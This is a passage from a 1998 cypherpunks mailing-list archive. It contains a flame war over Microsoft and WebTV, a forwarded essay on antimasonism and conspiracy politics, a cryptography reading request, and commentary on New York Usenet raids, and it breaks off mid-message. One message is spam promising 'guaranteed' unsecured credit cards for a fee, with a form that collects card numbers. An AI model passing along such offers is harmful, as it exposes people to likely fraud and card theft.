>it's just that he's managed to hide it from the world
............................................................


Do you have some kind of emergency which requires that you get a web TB with
java Real Soon Now, but that stinkin' rotten billg is making life hard on
you?  Like there aren't other companies working in this market as well, and
will jump at the opportunity to include features left out by their
competitors (in particular, Microsoft) for the benefit of whiners like you?
It's not like he (or the other companies working on this project) *owe* it
to you, you know.

It's more like you have to wait for someone to come up with the idea, then
to do all the work of putting it together, then you have to decide whether
you want it, then you put your money down.   You're so juvenile.  But so
amusing.

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 31 Oct 1998 10:26:22 +0800
To: cypherpunks@cyberpass.net
Subject: Hayek Web Page URL Notice
Message-ID: <v04020a03b26020b16dd4@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date:         Fri, 30 Oct 1998 20:31:06 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      Hayek Web Page URL Notice
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

You may find the Friedrich Hayek Web Page of interest,
on the web at:

   http://members.aol.com/gregransom/hayekpage.htm

Hyperlink:

     <A HREF="http://members.aol.com/gregransom/hayekpage.htm">The Friedrich
Hayek Scholars' Page</A>

The Hayek Page includes links to articles by Hayek,
interviews with Hayek, articles on Hayek available
on the internet, Hayek's complete bibliography,
the register of Hayek's collected papers, quotes
on Hayek, quotes by Hayek, the Nobel press release
announcing Hayek's Nobel Prize, a fact file on
Hayek, and a bibliography of writings on Hayek, among
many other resources.

The Hayek Page also includes links to the Hayek-L
email list searchable Electronic Archive, as well as links
to the Hayek-L guidelines for posting, and to the
Listserv commands for changing the setting to your
Hayek-L subscription -- including instructions for joining
the Hayek-L email list.


Please feel welcome to forward along this message
to other email lists and individuals where appropriate.


For further information contact:

Greg Ransom
Dept. of Social Science
MiraCosta College
gbransom@aol.com


>>  END  <<

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 31 Oct 1998 04:50:45 +0800
To: cypherpunks@Algebra.COM
Subject: Texans Face Life For E-Mail Threats
Message-ID: <199810302006.VAA27347@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Yahoo! News    Texas Headlines 

Friday October 30 5:21 AM EDT 

Texans Face Life For E-Mail Threats - (BROWNSVILLE) -- A Brownsville jury has returned a split verdict in the
trial of three alleged ``Republic of Texas'' members accused of making terrorist threats. Forty-three-year-old Jack Grebe
(GREEB) and 72-year-old Johnie Wise were convicted for sending electronic e-mail to President Clinton and several
other federal officials... warning they were ``targeted for revenge''. Sixty-three-year-old Oliver Emigh (EM-EE) was
acquitted of all charges. The jury also found the trio NOT GUILTY of plotting to use modified cigarette lighters to fire
cactus needles... tipped with a biological poison. Grebe and Wise will be sentenced in January and face a maximum
penalty of life imprisonment. 



















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 31 Oct 1998 05:29:52 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199810302056.VAA31759@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


From:	Petro [SMTP:petro@playboy.com]
Sent:	Friday, October 30, 1998 12:07 PM
To:	cypherpunks@einstein.ssz.com
Subject:	Re: FW: rules of engagement (fwd)

I am not sure, but is this an idea to put the 3 line RSA Perl
implementation in the classified adds? (as near as I could gather
trying to
read ahead) If not, what is it?

Yes.  The reference was to the 3 line RSA Perl implementation in ads. 
Didn't seem to get as an enthusiastic response as back in late summer.

me.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

iQA/AwUBNjnS1nUkEFXvH2ZAEQIYewCfbUfDHUF51IjAl1u2q1wC9JcWS7gAn325
V8c9VPuwEZmebGX2s9tJqkap
=CD5B
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 31 Oct 1998 05:33:55 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199810302100.WAA32146@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


testing...

me



-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

iQA/AwUBNjnTTXUkEFXvH2ZAEQLfaACfdpJivYj4Cz8BQWSBn+bcNjkfKTsAoIpF
s7LLMoFoUJqld5+r/C+mJQly
=LzNe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 31 Oct 1998 11:40:28 +0800
To: cypherpunks@cyberpass.net
Subject: [RRE]The Return of Antimasonism in American Political Life
Message-ID: <v04020a05b2602e1192b0@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 30 Oct 1998 17:59:29 -0800 (PST)
From: Phil Agre <pagre@alpha.oac.ucla.edu>
To: "Red Rock Eater News Service" <rre@lists.gseis.ucla.edu>
Subject: [RRE]The Return of Antimasonism in American Political Life
Sender: <rre@lists.gseis.ucla.edu>
Precedence: Bulk
List-Subscribe: <mailto:rre-on@lists.gseis.ucla.edu>


Conspiracy and Reason:
The Return of Antimasonism in American Political Life

Phil Agre
http://dlis.gseis.ucla.edu/

(I wrote this back in the spring, but it seems even more relevant now.)

When going to the movies, my favorite part is afterward, walking back
out into the world, seeing everything through the prism of the movie.
After seeing Terry Gilliam's bizarre "12 Monkeys", for example, I drove
across San Diego in the grip of a delusion that I was Bruce Willis,
warning Cassandra-like about a catastophe that nobody wanted to hear
about.  Of course it didn't make sense.  Am I really warning anyone
about a catastrophe?  Is nobody really listening?  But that's how it
felt for a good couple of hours.

I got that feeling again this afternoon.  For the last few months,
in amongst my official duties, I have been reading the literature on
apocalytic social movements.  I was originally inspired in this by David
Noble's book "The Religion of Technology".  Noble observes, for example,
that many of the important early engineers, particularly in the United
States, were Masons, and he describes the development of a particular
kind of millennialism -- or at least a secularized form of religious
utopianism -- among engineers that became secularized and formed the
outlines of technical movements such as artificial intelligence and --
he might as well have added -- cyberspace.

As part of this reading campaign, earlier this week I read large parts
of Robert Fuller's "Naming the Antichrist", which is a history of social
movements in the United States that, from earliest colonial times to
the present, have claimed to identify the Antichrist that is mentioned
briefly in the visionary books of the Bible.  In reading Fuller's book,
all at once it occurred to me that the ongoing tidal wave of accusations
and innuendoes against Bill Clinton and his entire generation resemble
nothing so much as Antimasonism.  The similarities are most striking:
both involve attempts to foment hatred by ordinary people against their
slightly better-off and more cosmopolitan fellow citizens by implicating
them in an enormous Conspiracy.  Even the fine details of the
accusations are similar: in each case, for example, the conspirators
are said to undermine religion and promote decadence through the public
schools.  This analogy impressed me for a while, but then I cooled down.
Even when an analogy is instructive, one should determine its limits.
After all, nobody is claiming that Bill Clinton is mounting his vast
campaign of murder, drug dealing, treason, and bank fraud on behalf of
the Illuminati, right?  And with that thought I filed the whole thing in
my notebook.  That was Tuesday.

This afternoon, Friday, I happened to pass through a Barnes and Noble in
Costa Mesa, California.  I was there because the bookstore has a public
restroom and is on the way to the most excellent El Toro Bravo taco
stand, which does not.  Briefly inspecting the "New Non-Fiction Books"
shelves as is my custom, I noticed a new book by Tony Brown.  Its title,
"Empower the People", was not so promising, given that I've already
read quite a few books by conservative authors about how the free market
empowers people to make choices etc etc etc.  Yet something poked at
me to look closer, and I saw the subtitle: "A 7-Step Plan to Overthrow
the Conspiracy That Is Stealing Your Money and Freedom".  I opened the
book and found to my utter slack-jawed amazement that it described none
other than the great Conspiracy by the Illuminati, led by Bill Clinton.

I am not making this up.

Now, if the author of this book were a fringe crazy then it would only
be mildly odd to find the book in Barnes and Noble.  Just the other
day I sat on the floor in the Barnes and Noble at Pico and Westwood
in Los Angeles and read large parts of a well-produced volume entitled
"A Woman Rides the Beast" by Dave Hunt, which argues that the woman
seen riding on the back of the Beast in the Book of Revelation is
none other than the Virgin Mary as she is worshipped in the Catholic
Church.  (This is part of a resurgence of anti-Catholicism among some
American evangelical Protestants that deserves much more attention
than it has gotten -- see, for example, Michael W. Smith singing on a
recent record, amidst a lamentation of various sins, of people who are
"jaded by hypocrisies behind cathedral walls").  This is the sort of
fringe weirdness that is easy to write off.  But the author of "Empower
the People", Tony Brown, is not a marginal crazy.  I hate to be the one
to break this to you, but the United States is now a country in which a
man who believes that the President is an agent of the Illuminati has a
regular program on public television.

What are we to make of this?  Several things.  First, in the astonishing
climate of political warfare now under way in the United States, when
the speaker of the House insinuates in a speech at Stanford University
that the President is systematically killing his enemies (NY Times
5/3/98) and nobody finds this even slightly odd, we have to confront
the fact that in the late 18th century, during the formative decades of
the political culture of the United States, this country was positively
addled by conspiracy theories.  These theories were not prominent in
the writings of the educated secular elites who officially founded
the country.  But the rank and file of the Revolution were animated in
large part (though not, of course, solely) by elaborate claims to have
located the Antichrist in the crown and church of England, and in their
adherents in America.

Nor the American cultural inclination to conspiracy theories end
with the Constitution.  As the new country fought its first round of
political conflicts, the theories suddenly shifted their attention --
to the Masons.  This happened precisely 200 years ago, in fact, in 1798,
when the first tracts appeared describing the great Conspiracy of the
Illuminati, a subgroup of the Masons from Bavaria.  After smouldering
for several years, opposition to this Conspiracy became a substantial
social movement beginning around 1830 in the "burned-over district"
of upstate New York, so-called because of the waves of evangelical
religious enthusiasm that had swept over the area.  (Madison probably
had an earlier wave of revivals, the First Great Awakening, in mind
when he expressed relief in the famous tenth Federalist Paper that
social movements that rise up in one part of the country, particularly
religious movements that devolve into political ones, cannot easily
spread to other areas.)  The Antimasonic movement became a political
party which contested several elections before collapsing a decade
later.

You will recall that many early American engineers were Masons, as were
many of the Founding Fathers.  But who exactly were the Masons?  The
Masons originated as a medieval guild, but during the period in question
they were a semi-secret society of white men who constituted themselves
on classical Greek and Roman models as the intellectual elites of
their respective countries.  In this sense, Antimasonism was very much
a revolt against educated people.  That it was also a revolt against
the same people who founded the country was, so far as I can determine,
little-noted at the time.

It is often observed that cultural patterns are able to go underground
for decades or centuries, only to spring fully-formed to the surface
once again, as if they were brand new, when the time is right.  And
that, I would suggest, is what's happening now.  If this were the late
18th century, white men who rose through education from relatively poor
backgrounds -- men such as Bill Clinton -- would be spinning classical
political philosophies and writing the Constitution, and conservative
evangelical ministers would be spinning conspiracy theories and opposing
the Constitution on the grounds that (quite the opposite of what many
such ministers say today) it does not create a Christian nation.  The
vigorous but ideologically vague patriotism of the contemporary anti-
government movement likewise corresponds to the equally vague ideas of
the 18th century conspiracy theorists.

In drawing out these parallels, I am particularly struck by the place
of technology in American political culture.  The early engineers --
the men who founded the country's original technological institutions
-- were largely Masons, and popular reactionary movements in the United
States have increasingly incorporated technological themes into their
theories.  Computers, for example, play an important role in conspiracy
theories based on the Book of Revelation.  Viewed superficially,
these theories sometimes seem to resemble the much more serious ideas
of privacy and civil liberties advocates.  My experience, however,
is that the people who spin such theories are indifferent to accurate
information about the nature and use of computers, no matter how
unsettling; their concern with the technology is much more symbolic.

In my view, a critical turning point in American cultural constructions
of information technology occurred in the 1970's, in the wake of the
Vietnam war.  This cultural shift has been brilliantly documented by
James W. Gibson's "Warrior Dreams: Paramilitary Culture in Post-Vietnam
America" (1994).  The Vietnam war, Gibson observes, was organized
largely by men from elite institutions who believed in formal
rationality and made heavy use of mathematical decision-making models.
They lost, and there arose in the aftermath of that loss an important
cultural narrative that was best captured by Sylvester Stallone's
"Rambo".  Rambo is a lone individual who keeps fighting despite having
been betrayed by decadent institutions.  Cold War heroes, by contrast,
may have been ambivalent about their institutions, but they were
insiders -- they were part of the institution.  Rambo is an outsider.
He has two enemies, the "official" enemy and the institution itself.
This figure of the betrayed and wounded hero fighting two enemies has
become deeply engraved in American culture.  Constrast, for example,
the original Cold War era (1966-1969) "Mission: Impossible" television
series and the 1996 movie version starring Tom Cruise.  In the
television version, the government is completely unquestioned, but for
Tom Cruise, the CIA is the enemy as well.

Rambo epitomized a new cultural construction of masculinity, set against
institutions rather than identifying with them.  And technology was
identified with the institutions.  This helps to explain why Hollywood
has apparently decided that computers and rationality are feminine
domains.  (Think, for example, of "The X-Files".)  Cultures often
define men as "outside" of something and women as "inside"; what varies
is the something.  In this case, the something is the institutional
world, technology and all.  The Rambo phenomenon also helps to explain
the otherwise mysterious shift that took place during the 1980's in
prevailing cultural constructions of computer hackers: the original
hackers were comfortably identified with military-sponsored research
institutions, but then the word "hacker" suddenly shifted around
to refer to men, whether bad criminals or virtuous rebels, who were
outside of and opposed to institutions.  This, in turn, helps explain
the peculiar divide on the political right between those cultural
conservatives -- the inheritors of the Antimasonites -- who persist in
identifying technology with oppressive institutions and a demographically
narrow but highly educated group of libertarians who have redefined
technology as an instrument for the destruction of institutions.

The point here is not that Rambo appeared from nowhere.  Quite the
contrary, "Rambo"'s construction of the Vietnam war drew upon and
revalued elements of American historical memory that have been handed
down, for the most part unconsciously, by all sorts of mechanisms
throughout the country's history.  And once it did, neoconservative
intellectuals such as Irving Kristol set about reinterpreting those
cultural forms in terms of their "New Class" political strategy.  That
phrase, "New Class", was originally applied by Milovan Djilas in his
analysis of the bureaucrats who consolidated their power in the Soviet
Union.  True to the ideologies of Lenin and Stalin, these people were
drawn primarily from the lower strata of Russian society, semi-educated
and selected through the Soviet examination system (itself originally
derived, via European variants, from the classical Chinese system), and
installed in positions of power that they proceeded to consolidate over
several decades.

The neoconservatives' strategy is to portray American liberals as
an analogue of the Soviet New Class and to use the money of the rich
to mobilize working people against professionals and the poor.  This
helps to explain why conservative rhetoric virtually never discloses
the existence of working-class liberals, and why the party that enjoys
the overwhelming support of wealthy Americans persists in appropriating
generations of left-wing rhetoric to portray liberals as a wealthy
"elite".  (It's bad to foment envy against the rich, apparently, but
not against college professors.)  This whole strategy succeeds in large
part because of the whole historical inheritance of Antimasonism and its
successive generations of descendents.  The liberals, in short, are the
new Masons.

In his history of German intellectual life in the era that led up to
the Nazis, Georg Lukacs spoke of a "destruction of reason" -- a step-
by-step demolition of rational thought that became possible as Germans
found themselves willing to project more and more and more of their own
negative impulses into a vast enemy.  Tony Brown's "Empower the People",
it seems to me, is one very clear step in a destruction of reason
that is currently far along in the United States.  Antimasonism is the
American equivalent of fascism, and Antimasonism is coming back.  Will
the relatively rational antiliberalism of neoconservative intellectuals
be drowned by the unfortunate tradition of conspiratoralism upon which
it draws its emotional force?  That, it seems to me, is an urgent
question for our country right now.

end

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Fitzpatrick" <fnord@antioch-college.edu>
Date: Sat, 31 Oct 1998 14:55:27 +0800
To: <cypherpunks@toad.com>
Subject: Entropy
Message-ID: <000901be0421$42f46f60$6ffadac7@bw111.antioch-college.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello out there.

I propose a question to the Cypherpunks  community.  Other than the
infamous Claude Shannon paper published in '49 in the Bell Systems
Technical Journal "Communications Theory of Secrecy Systems",  I am
looking for a good (maybe a more layman level, published in the last
decade or so, and available on the web)  paper describing the
relationship between entropy (of information systems) and secure
communication.  

If no-one has any good suggestions, maybe you could email me with your
favorite number or color or size of pants.  

Just kidding, what I am really interested  in is, is how much Jelllo
you can fit in  your left sock.  Or hell, send me your most
provocative pictures of Margaret Thatcher in the nude.

I am, in my uneducated state of fourth-year mathematics major at
Antioch College, attempting a research project in the field of
cryptography, and would appreciate citations of sources you consider
significant developments in the field of cryptography, in the last 50
years or so.  

But your flammability has nothing to do with this request for
information at all.

So, goddamnit, thanks for your help.

Matthew Sommers Fitzpatrick
fnord@antioch-college.edu
http://antioch-college.edu/~fnord/





-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

iQA/AwUBNjlopHlvMHCiUH52EQJD0QCg7QTES6BZRfJUDUx9+VCQmySuzMMAnRFb
OJLWPgZBBHYn4MP87QVrSW2f
=SvDu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 31 Oct 1998 19:26:02 +0800
To: "blancink" <blancink@cnw.com>
Subject: Re: network computers, web TV, java
In-Reply-To: <001c01be0487$d9185860$218195cf@blanc>
Message-ID: <199810310931.BAA20649@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



hi BLANK
a company has a *reponsibility* to its customers. perhaps
you would care to deny that?? gates has a *responsibility*
to his customers. what is that responsibility? to create
products they want. to anticipate their needs. 

you, working at MS, and spouting the official company line
(and not identifying your affiliation, like
all corporate slaveminded robots) would have a hard time
grasping that. nice of you not to use your MS address <g>

a web tv with java has had *extreme* interest from around
the country!! but MS is not merely not doing web tv with
java. they are sending out smoke signals that they will
do it one minute, but then SIT ON IT. thus cleverly preventing
any other companies from even thinking about it. as I understand it,
as early as 97 it was announced it would happen. this is a way
of STALLING, and pissing on a market. 

so BW, what happens if another company does create itself
to solve this little problem? and in 2 years we actually
have a java type web tv??? well, would you apologize then??
what about the 2 years we didn't have one because of MS's
outright inexcusable *arrogance*?? do you think that this means
that people didn't want it until 2 years from now?  if so, you'd
be an idiot. yes, another company will
come along and cannibalize and disembowel MS if they keep this crap up.
and they will show NO MERCY to MS just as MS has shown NO MERCY
to anyone else.

it all smells like IBM not wanting to sell PCs because it
would cannibalize their mainframes. 

yes, Win95 is a decent operating system-- by 95 standards.
by year 2000 standards, I think it is starting to lose
touch with what customers really want-- something that you
don't have to be a geek to run. the public is rapidly beginning
to understand that it isn't that they are stupid, it's just
that the OS is stupid....

how many people have ever had to reinstall windows 95 and
a lot of other software to fix  a simple trivial glitch???
a decent OS would know when it has been corrupted. in
fact with a really good one,  corruption is IMPOSSIBLE.
by well behaved apps or nonwell behaved, take your pick.


MS is getting too arrogant. you can call me whatever names
you want, but I know that they have hit the point of no
return. just recently. in fact, that's why I thought I
would announce it to ya'all <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sat, 31 Oct 1998 21:47:25 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: network computers, web TV, java
In-Reply-To: <199810310931.BAA20649@netcom13.netcom.com>
Message-ID: <000101be04d1$40e3cee0$3c8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vlad Ze Nurdi, Who Still Doesn't Get It:
(sigh.  I don't usually reply point-by-point, but this calls for it)


: a company has a *reponsibility* to its customers. perhaps
: you would care to deny that?? gates has a *responsibility*
: to his customers. what is that responsibility? to create
: products they want. to anticipate their needs.

	You speak of responsibility as if it was a total assimilation, and as if it was
a given which is to be expected, now that they've dissolved everyone's
resistance.   Spineless.

	An individual, or the company which they have created, does not have the
responsibility to customers, prior to having acquired customers, to supply them
with heretofore unknown pleasures.  They have all sorts of responsibilities
which they create once they have obtained the support of customers, but not in
advance.   And even after they have established a client base, they do not
thereby become burdened forevermore with the obligatory responsiblity to provide
those users with their future desires, needs, and wants, which no one knew was
possible until the Research Department announced its discovery.

	Joe Random cannot be accused of negligence from the fact that he didn't invent
Linux or Unix or NT.   He has no responsibility to create the new products that
Random User wants, he is under no obligation to anticipate their needs, or be
considered responsible for the fact that Random User is sitting in his darkened
apartment with nothing to do, waiting for someone to offer him a java-enabled
WebTV with 500 interactive channels, nor to be charged with ir-responsibility
because he didn't realize that Random User doesn't have a life and constantly
needs more entertainment and fresh updates to keep his eroding intellect
occupied.


: you, working at MS, and spouting the official company line
: (and not identifying your affiliation, like
: all corporate slaveminded robots) would have a hard time
: grasping that. nice of you not to use your MS address <g>

	For the record, I have not worked at MS for a year.   Furthermore, I am not
addressing the quality of their products, but the error in proposing that one
has a right to a claim to their future productivity for the benefit of Random
User and All Cyberspace.


: a web tv with java has had *extreme* interest from around
: the country!! but MS is not merely not doing web tv with
: java. they are sending out smoke signals that they will
: do it one minute, but then SIT ON IT.

	So?   If they decided to close up shop tomorrow, that would be their
prerogative.   They were not instigated by Government to produce products for
you, products to bitch about for 1)  being of low quality or for 2) failing to
produce them fast enough to suit you.


:thus cleverly preventing
: any other companies from even thinking about it. as I understand it,
: as early as 97 it was announced it would happen. this is a way
: of STALLING, and pissing on a market.

	Did you ever see that bookcalled "The Other Guy Blinked"?   I think it was
about the Pepsi/Coca-Cola war  where the companies were competing for a merger
or something of the sort.   One company got the deal because the other company
did not respond fast enough, or something like that.

	That's the way it is in the market these days, in case you hadn't heard - speed
is of the essence.   If Microsoft is stalling, that is all the opportunity a
computer shark needs to swallow that market segment by being there first and
nabbing the eagerly-awaiting customer's business.  And correct, no one will cry
with sympathy that Microsoft was edged out of the lead.   So what are these
sharks waiting for?   They can use their own judgement about proper market
timing, they don't have to wait for Microsoft.   They can make some profit/cost
calculations and decide what risks to take.  They have Business Analyst MBAs
working in their Finance and Marketing departments, people with years of
experience, getting highly paid to give them advice on these things.   They can
decide to work with Sun, instead.


: so BW, what happens if another company does create itself
: to solve this little problem?

	Then it's Microsoft's problem, isn't it.  They'll have to get together over a
latte' and figure out what to do about it.  This is not an exceptional,
out-of-the-ordinary situation.   It's part of struggling in the highly
competitive global world of technology.   That's part of the work of doing
business in the free-market:  success is not pre-arranged by government and
imposed by law upon the open-mouthed population (not quite yet, anyway).   It's
up to everyone to stay alert and pay attention.   You blink, you lose.  They
know this.   Question is, why you, who is not in the playing field, are so
worried about it, in particular as you despise Billg and look forward to his
demise.  Jealous?


:and in 2 years we actually
: have a java type web tv??? well, would you apologize then??

	Frankly, My Dear . . . it's not my responsiblity to worry about it.  I don't
get paid to agonize like you do for free.

[. . .]
: MS is getting too arrogant. you can call me whatever names
: you want, but I know that they have hit the point of no
: return. just recently. in fact, that's why I thought I
: would announce it to ya'all <g>

	So have you morphed into the CyberCop of Attitude?  Taking the world of
software upon your keyboard-hunched shoulders? What in the world does
Microsoft's stand have anything to do with your own experience of Life, the
Universe, and Everything?   I thought you preferred Linux, which is having a
surge of interest and enlarged user base.   And Unix - everyone likes Unix, why
don't you focus on them instead?   Why don't you exult over their superiority,
or why don't you write to Sun Microsystems - they had the idea for the Net PC
first, anyway, didn't they?  It's their responsibility to carry through on it.
Tell them they have the responsibility of supplying you *immediately* with their
version of a net PC (with their Java, of course).

	And get a job.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 31 Oct 1998 14:48:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: network computers, web TV, java
In-Reply-To: <001c01be0487$d9185860$218195cf@blanc>
Message-ID: <199810310622.HAA14682@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> blancink  <blancink@cnw.com> writes:

  > Do you have some kind of emergency which requires that you get a
  > web TB with java Real Soon Now, but that stinkin' rotten billg is
  > making life hard on you?

Naw, VZ probably just had the sort of day I've just had with NT, the
lower-than-pig-shit `operating system' that the marketing dickheads in
Redmond seem to have sold to every IT manager and pointy-hair boss in
this gawd-forsaken industry.

It doesn't bother me that Micro$hit have made nearly every technical
error that they could.  But I'm royally pissed off that they've
managed to sell this cruft to the ignorant folks with the cheque-
books, who then expect me to make their `virtual private empires' work.

Just frustration, you know...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bob@usa.net
Date: Sun, 1 Nov 1998 07:00:24 +0800
To: <cypherpunks@toad.com>
Subject: NOW!!!!   An Unsecured MASTERCARD/VISA?  100% Guaranteed Approval!
Message-ID: <199810312217.OAA06351@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



This is it !!!  Get an Unsecured Mastercard or Visa right now.   
<<APPROVAL IS GUARANTEED>> with our help.


     It doesn't matter if you have bad credit, no credit, a bankruptcy, 
or divorce.  Using our quick and unique system will quickly lead you 
step by step towards having a brand new unsecured Mastercard or Visa 
mailed to you within a few weeks. All of the banks issuing these credit 
cards are federally insured.  We guarantee that you will be appoved or 
your money will be fully refunded.  The cost is $32.  For a written 
brochure and order form, send a self-addressed stamped envelope to:
                                                                        
                Better Solutions
                2065 Rodney Dr. Ste.105, Dept. 410
                Los Angeles, Ca 90027

Or you may call the free recorded message line at (323) 782-5530

..Or Finally, to get your order processed even faster, you may print 
out and return the order form included below.  AND ONLY for those using 
this form and ordering within 7 days, we will take $7 off the regular 
$32 which lowers the fee to $25.  Order today and we completely 
guarantee your new unsecured card or your money will be refunded.

PLUS BONUSES...included in the package you will receive.
 
*  Cards With No Annual Fees (Save $50-$75 per year)

*  Also Cards With Interest Rates As low As 5.9% (Save Hundreds $$)

*  Great Secured Card Offers

*  Other Types of Unsecured Credit Cards (not visa or Mastercard)    
   Guaranteed!!!

*  Valuable Information and Directions For **Improving Your Credit    
   File**

*  3 Other FREE Bonuses (One is a FABULOUS VACATION CERTIFICATE         
   including three days, two nights w/free hotel at one of over 25      
   choice destinations, with absolutlely no other purchase required)
                           
   
  ------------------------------------------------------------------- 
                     PRINT OUT THE FORM BELOW 
  ------------------------------------------------------------------- 

               ***   $7 OFF RISK-FREE ORDER FORM   ***
  
  If you are ordering within 7 days, your cost is only $25.00. If 
  not, please fill out this form and enclose the regular $32.00. 
  Please mail payment to: Better Solutions 2065 Rodney Dr. Suite 105   
  Dept.410 LA CA 90027. 

  (Circle One)  Paying by:   Check     Money Order     Credit Card 
  
  Make payable to:  Better Solutions


  First Name____________________Last Name ___________________________ 

  Mailing Address____________________________________________________ 

  City______________________________State_____________Zip____________ 

  Phone (     ) __________________Email Address______________________ 

  Where You Read About Better Solutions?________$ Amt. Enclosed?_____ 

  (WE ACCEPT Visa, Mastercard, Discover, or American Express) 

  Type of card(e.g.Visa)_______________Card#_________________________ 

  Expiration Date________________ $Amount(Circle One)?   $55   $27.50 

  I am legally authorized to make purchases using this card. After the  
  45 day guarantee, I forfeit my right to chargeback and request a      
  reversal of charges for this credit card purchase. 

  Signature____________________________Date_______________________

  Please Note: If you pay by money order, your order will be processed 
  immediately and sent out the next day. We wait for all checks to 
  clear so there will be a 7-14 day delay on your order being 
  processed. Credit cards clear faster than checks but slower than
  money orders. If you are paying by credit card, all the information   
  must be there for order to be processed!
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sun, 1 Nov 1998 01:54:02 +0800
To: cypherpunks@cyberpass.net
Subject: Usenet Under Siege
Message-ID: <199810311726.LAA16766@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Interesting developments in the election year attempts by New York
State Attorney General Dennis Vacco to create legal liability for ISPs
over Usenet content, particularly alleged child porn.
 
Over the past few years, a number of national news providers, under
pressure from various self-declared "child advocates," have filtered
out articles from their feeds whose newsgroup names suggested that
depictions of the sexuality of minors were topical.
 
Given that Usenet routes around censorship, that a "newsgroup" is not
a tangible entity, but simply one line on a Usenet article which
attempts to roughly categorize it, and that the Usenet newsgroup
namespace is practically infinite, such attempts to curtail the topics
discussed in the worldwide real-time conversation that is Usenet have
been laughably unsuccessful.
 
While uncensored Usenet feeds are still the standard most customers
demand, this content-based pruning of the daily newsfeed by some ISPs
has provided the opportunity for some in law enforcement to
characterize uncensored news servers as some sort of outlaw minority.
Law enforcement is now trying to use such representations as a
pretense to erode the notion that ISPs should enjoy common carrier
status for content they do not originate.
 
It therefore came as no surprise when Dennis Vacco, the incumbent New
York Attorney General, and an individual who has built his reputation
with numerous publicity stunts revolving around sexual vices featuring
those under the legal age of majority, seized the news servers of
Dreamscape and Buffnet in a highly publicized raid, accompanied by
simultaneous press releases and Web pages, announcing that he had
broken up an "International Child Pornography Ring." 13 individuals in
several countries were also arrested on various possession,
trafficking, and promotion charges involving illegal erotica.
 
The fallacies in Vacco's spewage were innumerably large.  There was
the absurd idea that a running gag in one newsgroup involving a
mythical "Pedo University" indicated the existence of a "virtual
academic institution devoted to the sexual abuse of children." Vacco
also seemed to believe that individual Usenet newsgroups were owned
and operated by specific individuals, and that certain newgroups were
"providing services" to the aforementioned imaginary academic
institution.
 
In reality, no one owns or operates a Usenet newsgroup, and any
individual may post anything he likes to any newsgroup at any time,
either anonymously, or with identifying information attached.
 
Dennis Vacco's clueless attack on the global Usenet may in fact
backfire, as there is presently serious discussion over a possible
three day protest, in which all traffic destined for the groups
targetted by Vacco will be posted instead to alt.law-enforcement.
 
Vacco's plans to undermine claims of common carrier status for ISP's
can be found in his following statements.
 
     "Most Internet service providers choose not to carry
      news groups that cater to the interests of child porn
      traffickers for obvious reasons.
 
     "Those that do are well aware of their nature and
      purpose, possess the offensive images on their servers,
      and facilitate the transfer and trading of child
      pornography."
 
CNET News.com provides the following article by Paul Festa giving
